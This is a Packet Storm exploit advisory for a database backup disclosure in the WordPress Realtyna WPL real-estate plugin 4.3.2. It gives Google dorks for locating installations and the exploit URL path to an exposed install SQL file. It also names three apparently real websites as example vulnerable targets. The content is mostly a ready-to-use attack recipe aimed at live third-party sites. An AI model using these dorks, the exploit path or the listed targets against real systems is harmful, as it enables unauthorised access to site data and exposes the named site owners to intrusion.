WordPress Real-Estate-Listing-Realtyna-Wpl 4.3.2 Database Disclosure

2018-12-10T00:00:00
ID PACKETSTORM:150697
Type packetstorm
Reporter KingSkrupellos
Modified 2018-12-10T00:00:00

Description

                                        
                                            `#################################################################################################  
  
# Exploit Title : WordPress Real-Estate-Listing-Realtyna-Wpl Plugins 4.3.2  
Database Backup Disclosure  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 08/12/2018  
# Vendor Homepage : realtyna.com ~  
wordpress.org/plugins/real-estate-listing-realtyna-wpl/  
# Software Download Links :  
downloads.wordpress.org/plugin/real-estate-listing-realtyna-wpl.4.3.2.zip  
+ realtyna.com/real-estate-theme-wpl-pro-package/  
+ github.com/wp-plugins/real-estate-listing-realtyna-wpl/archive/master.zip  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 2.8.0 and 4.3.2  
# Exploit Risk : Medium  
# Google Dorks :  
inurl:''/wp-content/plugins/real-estate-listing-realtyna-wpl/''  
intext:''A(c) 2017 Swadesi. All Rights Reserved.''  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access  
Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]  
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]  
  
#################################################################################################  
  
+ Realtyna Organic IDX plugin + WPL Real Estate 4.3.2 Database Backup  
Disclosure  
  
#################################################################################################  
  
# Admin Panel Login Path :  
  
/wp-login.php  
  
# Exploit :  
  
/wp-content/plugins/real-estate-listing-realtyna-wpl/assets/install/queries.sql  
  
#################################################################################################  
  
# Example Vulnerable Sites =>  
  
[+]  
healthproperty.ca/wp-content/plugins/real-estate-listing-realtyna-wpl/assets/install/queries.sql  
  
[+]  
swadesi.com/news/wp-content/plugins/real-estate-listing-realtyna-wpl/assets/install/queries.sql  
  
[+]  
pytcherhomes.com/wp-content/plugins/real-estate-listing-realtyna-wpl/assets/install/queries.sql  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`